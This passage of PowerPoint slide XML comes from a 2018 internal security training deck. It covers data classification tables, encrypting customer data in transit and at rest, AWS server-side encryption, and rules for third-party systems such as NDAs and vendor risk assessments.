                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="5DB2F4"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>✔</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="5DB2F4"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="5DB2F4"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>✔</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="5DB2F4"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="5DB2F4"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>✔</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1336977">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="FF320A"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>✔</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnL w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnL>
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="FF320A"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>✔</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="FF320A"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>✔</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="FF320A"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>✔</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="FF320A"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>✔</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="FF320A"/>
                          </a:solidFill>
                        </a:defRPr>
                      </a:pPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr defTabSz="914400">
                        <a:defRPr sz="1800"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="6400">
                          <a:solidFill>
                            <a:srgbClr val="FF320A"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>✔</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="50800" marR="50800" marT="50800" marB="50800" anchor="ctr" anchorCtr="0" horzOverflow="overflow">
                    <a:lnR w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnR>
                    <a:lnB w="12700">
                      <a:solidFill>
                        <a:srgbClr val="353535"/>
                      </a:solidFill>
                      <a:miter lim="400000"/>
                    </a:lnB>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1179" name="General"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1636191" y="6772563"/>
            <a:ext cx="2414663"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a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>General</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1180" name="Business"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1318691" y="8046241"/>
            <a:ext cx="2732163"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a:solidFill>
                  <a:srgbClr val="5DB2F4"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Business</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1181" name="Customer"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142888" y="9323140"/>
            <a:ext cx="290796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a:solidFill>
                  <a:srgbClr val="FF320A"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Customer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1182" name="Data Handling"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Data Handling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1183"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184"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185" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1186" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1187" name="Authentication"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="5318032" y="4785835"/>
            <a:ext cx="2811786" cy="650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300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1188" name="Access Control"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="7944618" y="4728533"/>
            <a:ext cx="2973859" cy="650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300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Access Control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1189" name="Storage"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="10831496" y="5205976"/>
            <a:ext cx="1623449" cy="650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300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1190" name="Auditing"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="13583286" y="5189480"/>
            <a:ext cx="1670107" cy="650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300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Auditing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1191" name="Encryption"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="16085212" y="5024882"/>
            <a:ext cx="2135660" cy="650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300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1192" name="Distribution"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="18942455" y="4983787"/>
            <a:ext cx="2251894" cy="650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300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Distribution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Destruction"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="18900000">
            <a:off x="21613471" y="4975539"/>
            <a:ext cx="2275223" cy="650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3300">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Destruction</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7"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198"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199" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1200" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1201" name="Customer data should always be encrypted in transit and at rest."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Customer data should </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>always</a:t>
            </a:r>
            <a:r>
              <a:t> be encrypted in transit and at rest.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202" name="KEY TAKEAWAY"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20250661" y="358292"/>
            <a:ext cx="3717418" cy="735952"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 13906"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="25C15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KEY TAKEAWAY</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6" name="AWS Encryption"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>AWS Encryption</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1207"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208"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209" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1210" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SECURITY TRAINING, 2018</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1211" name="Screen Shot 2018-04-06 at 11.30.48.png" descr="Screen Shot 2018-04-06 at 11.30.48.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="808646" y="5961994"/>
            <a:ext cx="9644433" cy="5245850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1212" name="Screen Shot 2018-04-06 at 11.31.57.png" descr="Screen Shot 2018-04-06 at 11.31.57.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10956783" y="3909681"/>
            <a:ext cx="16328357" cy="4431983"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1213" name="Screen Shot 2018-04-06 at 11.33.50.png" descr="Screen Shot 2018-04-06 at 11.33.50.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12471400" y="8843658"/>
            <a:ext cx="9480603" cy="2881361"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1214" name="It’s easy peasy, and pretty much always just a single click."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="989385" y="2848808"/>
            <a:ext cx="1196488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3600">
                <a:solidFill>
                  <a:srgbClr val="A6AAA9"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>It’s easy peasy, and pretty much always just a single click. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1215" name="https://aws.amazon.com/blogs/security/tag/server-side-encryption/"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051818" y="12544209"/>
            <a:ext cx="22381964" cy="44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000" u="sng">
                <a:solidFill>
                  <a:srgbClr val="25C151"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Helvetica"/>
                <a:hlinkClick r:id="rId7" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr u="none"/>
            </a:pPr>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId7" invalidUrl="" action="" tgtFrame="" tooltip="" history="1" highlightClick="0" endSnd="0"/>
              </a:rPr>
              <a:t>https://aws.amazon.com/blogs/security/tag/server-side-encryption/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1216" name="info-white.png" descr="info-white.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="735727" y="12616767"/>
            <a:ext cx="309895" cy="309894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="fast"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0" name="Third-Party Systems"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Third-Party Systems</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1221" name="Follow the same rules!…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Follow the same rules!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Access should be restricted.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Data transmitted only over secure channel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>NDA should be in place with third-party.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="5800"/>
            </a:pPr>
            <a:r>
              <a:t>Vendor risk assessment completed </a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng"/>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:t> use.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1222"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22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224" name="public"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="23"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>public</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1225" name="SECURITY TRAINING, 2018"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="24"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr/>
            <a:r>
